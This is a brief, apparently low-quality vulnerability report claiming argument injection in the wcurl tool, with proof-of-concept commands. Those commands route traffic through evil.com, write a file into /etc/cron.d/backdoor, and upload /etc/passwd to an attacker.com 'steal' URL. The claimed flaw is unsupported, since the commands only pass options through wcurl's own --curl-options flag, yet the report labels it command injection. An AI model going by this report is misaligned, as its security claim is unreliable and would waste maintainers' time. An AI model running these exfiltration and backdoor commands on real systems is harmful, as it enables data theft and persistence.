wcurl Argument Injection via Unquoted Variable

when i was code auditing curl i stumbled uppon a vulnerablity that was on wcurl affected version:current step 1: open terminal step 2:run pocs below wcurl --dry-run --curl-options='-x http://evil.com:8080 -o /tmp/pwned' https://example.com/test.txt wcurl --dry-run --curl-options='-o /etc/cron.d/backdoor' https://attacker.com/malicious wcurl --dry-run --curl-options='-x http://attacker.com:8080' https://target.com/sensitive wcurl --dry-run --curl-options='-T /etc/passwd' https://attacker.com/steal https://x.com screenshots below if this is not a vulnerability i am sorry the dry run used to not harm the system ## Impact command injection